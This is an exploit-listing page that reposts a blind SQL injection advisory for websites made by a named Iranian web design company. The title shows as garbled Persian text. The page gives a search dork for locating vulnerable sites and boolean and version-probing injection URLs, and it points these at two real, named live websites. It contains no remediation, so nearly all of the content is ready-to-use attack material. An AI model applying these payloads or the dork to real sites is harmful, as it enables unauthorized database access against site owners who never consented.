طراØÛŒ شده توسط شرکت چنار خیام - Blind Sql Injection Vulnerability
CVE
Category
Price
Severity
CVE-XXXX-XXXX
CWE-XXXX
Unknown
High
Author
Risk
Exploitation Type
Date
Unknown
Critical
Remote
2023-08-15
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023080065 Below is a copy:
طراØÛŒ شده توسط شرکت چنار خیام - Blind Sql Injection Vulnerability *********************************************************
#Exploit Title: طراØÛŒ شده توسط شرکت چنار خیام - Blind Sql Injection Vulnerability
#Date: 2023-08-08
#Exploit Author: Behrouz Mansoori
#Google Dork: "طراØÛŒ شده توسط شرکت چنار خیام"
#Category:webapps
#Tested On: Mac, Firefox
[+] search Dork : "طراØÛŒ شده توسط شرکت چنار خیام"
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* https://hamrahpak.com/detail-service.php?id=12%27%20and%20false--+
* https://hamrahpak.com/detail-service.php?id=12%27%20and%20true--+
* https://hamrahpak.com/detail-service.php?id=12%27%20and%20substring(@@version,1,1)=8--+
### Demo 2:
* https://persian-cyclet.ir/store-detail.php?id=68%27%20and%20false--+
* https://persian-cyclet.ir/store-detail.php?id=68%27%20and%20true--+
* https://persian-cyclet.ir/store-detail.php?id=68%27%20and%20substring(@@version,1,1)=1--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum